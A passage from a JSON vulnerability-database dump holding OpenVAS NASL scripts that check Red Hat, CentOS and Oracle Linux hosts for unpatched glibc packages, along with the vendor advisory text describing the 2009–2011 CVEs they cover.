isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-03T10:57:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2018-01-03T00:00:00", "published": "2012-02-21T00:00:00", "id": "OPENVAS:870556", "href": "http://plugins.openvas.org/nasl.php?oid=870556", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0126-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0126-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. 
Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n\n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. 
The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n\n Users should upgrade to these updated packages, which resolve these issues.\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00027.html\");\n script_id(870556);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:56:49 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2012:0126-01\");\n script_name(\"RedHat Update for glibc RHSA-2012:0126-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T13:06:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2018-01-05T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881084", "href": "http://plugins.openvas.org/nasl.php?oid=881084", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0126 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0126 centos5 \n#\n# Authors:\n# System Generated 
Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n \n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. 
If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n \n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n \n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. (CVE-2011-4609)\n \n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. 
The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n \n Users should upgrade to these updated packages, which resolve these issues.\";\n\ntag_affected = \"glibc on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\");\n script_id(881084);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:03:45 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0126\");\n script_name(\"CentOS Update for glibc CESA-2012:0126 centos5 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881084", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881084", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0126 centos5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0126 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881084\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:03:45 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2012:0126\");\n script_name(\"CentOS Update for glibc CESA-2012:0126 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The glibc 
packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n A denial of service flaw was found in the remote procedure call (RPC)\n implementation in glibc. A remote attacker able to open a large number of\n connections to an RPC service that is using the RPC implementation from\n glibc, could use this flaw to make that service use an excessive amount of\n CPU time. 
(CVE-2011-4609)\n\n Red Hat would like to thank the Ubuntu Security Team for reporting\n CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The Ubuntu\n Security Team acknowledges Dan Rosenberg as the original reporter of\n CVE-2010-0830.\n\n Users should upgrade to these updated packages, which resolve these issues.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~65.el5_7.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:57:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2017-12-27T00:00:00", 
"published": "2012-07-30T00:00:00", "id": "OPENVAS:881217", "href": "http://plugins.openvas.org/nasl.php?oid=881217", "type": "openvas", "title": "CentOS Update for glibc CESA-2012:0125 centos4 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2012:0125 centos4 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. 
If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n \n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n \n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n \n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n \n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n \n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. 
If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n \n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment variables in the environment of a script that\n performed shell evaluation on the output of the locale command, ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"glibc on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-February/018427.html\");\n script_id(881217);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:48:09 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0125\");\n script_name(\"CentOS Update for glibc CESA-2012:0125 centos4 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of glibc\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", rpm:\"glibc-profile~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nptl-devel\", rpm:\"nptl-devel~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.3.4~2.57\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:58:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0296", "CVE-2011-1659", "CVE-2010-0830", "CVE-2011-1071", "CVE-2011-1095", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "description": "Check for the Version of glibc", "modified": "2017-12-29T00:00:00", "published": 
"2012-02-21T00:00:00", "id": "OPENVAS:870545", "href": "http://plugins.openvas.org/nasl.php?oid=870545", "type": "openvas", "title": "RedHat Update for glibc RHSA-2012:0125-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for glibc RHSA-2012:0125-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The glibc packages contain the standard C libraries used by multiple\n programs on the system. These packages contain the standard C and the\n standard math libraries. Without these two libraries, a Linux system cannot\n function properly.\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library read timezone files. 
If a\n carefully-crafted timezone file was loaded by an application linked against\n glibc, it could cause the application to crash or, potentially, execute\n arbitrary code with the privileges of the user running the application.\n (CVE-2009-5029)\n\n A flaw was found in the way the ldd utility identified dynamically linked\n libraries. If an attacker could trick a user into running ldd on a\n malicious binary, it could result in arbitrary code execution with the\n privileges of the user running ldd. (CVE-2009-5064)\n\n It was discovered that the glibc addmntent() function, used by various\n mount helper utilities, did not sanitize its input properly. A local\n attacker could possibly use this flaw to inject malformed lines into the\n mtab (mounted file systems table) file via certain setuid mount helpers, if\n the attacker were allowed to mount to an arbitrary directory under their\n control. (CVE-2010-0296)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way the glibc library loaded ELF (Executable and Linking\n Format) files. If a carefully-crafted ELF file was loaded by an\n application linked against glibc, it could cause the application to crash\n or, potentially, execute arbitrary code with the privileges of the user\n running the application. (CVE-2010-0830)\n\n It was discovered that the glibc fnmatch() function did not properly\n restrict the use of alloca(). If the function was called on sufficiently\n large inputs, it could cause an application using fnmatch() to crash or,\n possibly, execute arbitrary code with the privileges of the application.\n (CVE-2011-1071)\n\n It was found that the glibc addmntent() function, used by various mount\n helper utilities, did not handle certain errors correctly when updating the\n mtab (mounted file systems table) file. 
If such utilities had the setuid\n bit set, a local attacker could use this flaw to corrupt the mtab file.\n (CVE-2011-1089)\n\n It was discovered that the locale command did not produce properly escaped\n output as required by the POSIX specification. If an attacker were able to\n set the locale environment ...\n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"glibc on Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00026.html\");\n script_id(870545);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-21 18:55:19 +0530 (Tue, 21 Feb 2012)\");\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0296\", \"CVE-2010-0830\",\n \"CVE-2011-1071\", \"CVE-2011-1089\", \"CVE-2011-1095\", \"CVE-2011-1659\",\n \"CVE-2011-4609\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: 